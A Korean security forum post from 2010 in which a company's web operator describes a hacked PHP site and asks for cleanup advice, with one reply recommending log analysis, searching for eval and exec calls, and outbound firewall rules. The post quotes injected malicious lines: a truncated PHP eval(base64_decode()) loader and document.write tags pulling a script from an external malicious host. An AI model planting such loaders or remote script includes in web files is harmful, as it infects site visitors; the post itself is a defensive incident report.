크래킹 피해

423,

1/22

basscraft

백도어 관련 문의

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=473 [복사]

회사에서 호스팅하고 있는 서버에 해킹을 당해서
소스가 엉망이 되었습니다.

거의 10년 전쯤 php로 개발된 사이트입니다.
OS는 리눅스 입니다.

확인해 보니 php 파일 맨 처음에

<?php eval(base64_decode('aWYoIWZ1b... 생략...XSkpOw==')); ?>

이런 소스가 인젝션되어 있었습니다.
find 명령으로 'eval(base64_decode(' 문자열을 포함한 소스를 찾아보았더니
폴더별로 index.php 또는 index*.php 등 파일들에 인젝션되어 있습니다.

추가로 .js, .html 파일들에도

document.write('<script src=http://chefs.yoursecretchefs.com/images/gifimg.php ><\/script>');
document.write('<script src=http://chefs.yoursecretchefs.com/images/gifimg.php ><\/script>')
;document.write('<script src=http://chefs.yoursecretchefs.com/images/gifimg.php ><\/script>');

이런 내용들이 주입되어 있습니다.
관리를 제대로 못하고 있어서 소스도 백업이 안된 상태 -0-;;;;
노가다라도 일일히 찾아서 지우면 되겠지만

문제는 인젝션된 소스중 일부는 중간부분 이후 소스가 뭉텅 잘려버린 것들이 존재해서
복구가 불가능한 상태입니다.(오래된 소스를 찾아서 복구하고 있는중...)
복구를 다 한다고 해도 백도어 같은게 존재해서 또다시 들어올 것 같아서

어느사이트에서 본 확인 방법으로 확인해 보니

[aaa@xxx dev]$ find /dev -type f -exec ls -l {} \;
-rw-r--r-- 1 root root 196608 2월 27 04:47 /dev/.udev.tdb

이런 결과가 있습니다.
저게 백도어 맞는지...

당장 다시 설치하고 싶지만
일단 이번 문제만 어떻게 넘기고
사이트 리뉴얼을 하기로 잠정 합의된 상태입니다.

조언좀 부탁드립니다.

1. 추측되는 해킹의 방법
2. 해킹의 목적 예상되는 피해(회사 내, 외부)
3. 소스 복구시 유의할 점
4. 백도어 제거 및 시스템 정상화에 대한 조언

질문이 너무 많습니다만...
개별 항목이라도 답변주시면 복받으실 껍니다 ^^

Hit : 4888 Date : 2010/03/03 10:00


멍멍	1. 위 정보만으로는 추측하기 힘드나 주로 웹해킹이 많습니다. 파일이 변경된 시간에 해당하는 웹 로그를 분석해 보세요. 2. Script가 삽입된 것으로 보아 추가적인 Client 장악 시도가 예상됩니다. IE 브라우져위 취약점을 이용하여 웹 사이트를 방문하는 다른 Windows 사용자들을 추가 장악하는 것을 말합니다. 3. eval 외에도 system, exec, passthru, popen 함수 또한 백도어로 사용 가능하니 함께 검색해보세요 4. 크래킹을 야기한 취약점을 찾지 못하면 복구 후에도 재감염 될 가능성이 높습니다. Script를 심는 패턴은 웜(자동 공격)에 의한 공격일 가능성이 크기 때문입니다. iptables를 이용한 방화벽 정책 설정 또한 공격 방어에 도움이 될 것입니다. (outbounding -안에서 밖으로 나가는- 패킷 차단 등) 5. 답변 안 하면 복 못 받는건가요? ^^	2010/03/09

423

리눅스 시스템 해킹을 배우고싶은 컴공2개월 새내기입니다[9]

morieye

01/10

3401

422

마이쿼리 해킹

dlaudgkr

12/07

5457

421

와이파이 해킹[1]

LK7C SINEAD

09/17

3895

420

DB 가 해킹당했습니다.[5]

gilm1209

11/26

4156

419

이런 경우 아이디해킹 스팸으로 공격하면 안되는 건가요?[2]

writed

07/21

3599

418

개인 pc 보안점검 관련해서[1]

braveman2

08/06

3709

417

어느 질문방에 올려야 되는지 몰라서요~ 고수님들 도움부탁드려요~[1]

osssy

05/18

3222

416

해킹당한건지 아닌건지 확실하게 아는 방법 없나요?[2]

juh11

05/17

3848

415

windows2003 라우팅및 원격 액세스 해킹[1]

geneve27

04/26

5234

414

모르는 ip가 접근해왔는데 좀 봐주세요[4]

Gloverman

01/09

6068

413

해킹한다고 문자가 왔는데요[9]

yakida1940

10/03

4860

412

해킹당한거같아요[3]

dmscks1

07/15

4213

411

제가 .. 해커 한테 당했는데요 .. 지금 IP 도 따인 상태라 마우스랑 키보드가 ..[7]

zjafkays

07/06

5333

410

해킹을 당한것 같아요.....[5]

gkswls123

06/22

4461

409

도와주세요 ㅠㅠ[2]

wnm1234

05/17

3978

408

도와주세요.[2]

sdc04303

05/07

4865

407

여기에 써도 되는지 모르겠는데요 www.xindpkz.com 이것 때문에요 내용있습니다.[4]

nmy89

04/10

5846

406

Gmail을 해킹당해서 사용하지 못하고 있습니다.[3]

hoaxinh

02/07

5076

405

ㅠㅠㅠ[5]

씨에르

01/30

4325

404

아는 누님께서 스토킹(?)당하시는 듯 한데요..[3]

dokokou

01/22

6006

1 [2][3][4][5][6][7][8][9][10]..[22]